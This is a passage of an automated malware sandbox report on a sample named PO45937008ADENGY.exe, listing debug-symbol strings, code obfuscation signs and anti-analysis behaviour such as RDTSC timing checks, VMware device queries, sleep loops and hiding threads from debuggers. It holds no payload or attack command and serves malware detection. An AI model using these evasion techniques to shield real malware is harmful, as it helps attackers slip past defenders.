Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbg source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdb source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: powrprof.pdbT source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.pdb? source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbJ source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Users\user\Desktop\PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wlanext.pdbGCTL source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp
Source: PO45937008ADENGY.exe Static PE information: 0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
PE file contains an invalid checksum
Source: PO45937008ADENGY.exe Static PE information: real checksum: 0x16e14 should be: 0x29ee9
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 0_2_015BF138 pushad ; retf 0_2_015BF145
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041620A pushad ; iretd 9_2_00416230
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004152CC push ds; retf 9_2_004152DA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B3B5 push eax; ret 9_2_0041B408
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B46C push eax; ret 9_2_0041B472
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B402 push eax; ret 9_2_0041B408
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0041B40B push eax; ret 9_2_0041B472
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004154BD push fs; iretd 9_2_004154DA
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00415569 push edx; ret 9_2_0041568E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004155C6 push edx; ret 9_2_0041568E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0137D0D1 push ecx; ret 9_2_0137D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_0397D0D1 push ecx; ret 17_2_0397D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE52CC push ds; retf 17_2_02EE52DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE620A pushad ; iretd 17_2_02EE6230
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB3B5 push eax; ret 17_2_02EEB408
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE54BD push fs; iretd 17_2_02EE54DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB46C push eax; ret 17_2_02EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB40B push eax; ret 17_2_02EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EEB402 push eax; ret 17_2_02EEB408
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE55C6 push edx; ret 17_2_02EE568E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 17_2_02EE5569 push edx; ret 17_2_02EE568E
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED85E4 second address: 0000000002ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002ED897E second address: 0000000002ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc 9_2_004088B0
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6572 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 6996 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 0000000C.00000000.694685314.000000000A64D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&~
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.688629352.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.694504401.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: WerFault.exe, 0000000D.00000002.708068526.0000000004C20000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWT
Source: WerFault.exe, 0000000D.00000002.706779671.00000000011C8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000C.00000000.678387989.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000C.00000000.695029841.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000C.00000000.695297313.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: PO45937008ADENGY.exe, 00000000.00000002.723466381.00000000052D0000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000002.926030547.00000000058C0000.00000002.00000001.sdmp, WerFault.exe, 0000000D.00000002.708139307.0000000004D70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_004088B0 rdtsc 9_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_00409B20 LdrLoadDll, 9_2_00409B20
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135513A mov eax, dword ptr fs:[00000030h] 9_2_0135513A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135513A mov eax, dword ptr fs:[00000030h] 9_2_0135513A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov eax, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01344120 mov ecx, dword ptr fs:[00000030h] 9_2_01344120
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01329100 mov eax, dword ptr fs:[00000030h] 9_2_01329100
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h] 9_2_0132B171
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B171 mov eax, dword ptr fs:[00000030h] 9_2_0132B171
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132C962 mov eax, dword ptr fs:[00000030h] 9_2_0132C962
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h] 9_2_0134B944
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134B944 mov eax, dword ptr fs:[00000030h] 9_2_0134B944
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A51BE mov eax, dword ptr fs:[00000030h] 9_2_013A51BE
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h] 9_2_013561A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013561A0 mov eax, dword ptr fs:[00000030h] 9_2_013561A0
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A69A6 mov eax, dword ptr fs:[00000030h] 9_2_013A69A6
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_01352990 mov eax, dword ptr fs:[00000030h] 9_2_01352990
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135A185 mov eax, dword ptr fs:[00000030h] 9_2_0135A185
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0134C182 mov eax, dword ptr fs:[00000030h] 9_2_0134C182
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013B41E8 mov eax, dword ptr fs:[00000030h] 9_2_013B41E8
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0132B1E1 mov eax, dword ptr fs:[00000030h] 9_2_0132B1E1
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0135002D mov eax, dword ptr fs:[00000030h] 9_2_0135002D
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_0133B02A mov eax, dword ptr fs:[00000030h] 9_2_0133B02A
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h] 9_2_013F4015
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013F4015 mov eax, dword ptr fs:[00000030h] 9_2_013F4015
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
Source: C:\Users\user\Desktop\PO45937008ADENGY.exe Code function: 9_2_013A7016 mov eax, dword ptr fs:[00000030h] 9_2_013A7016
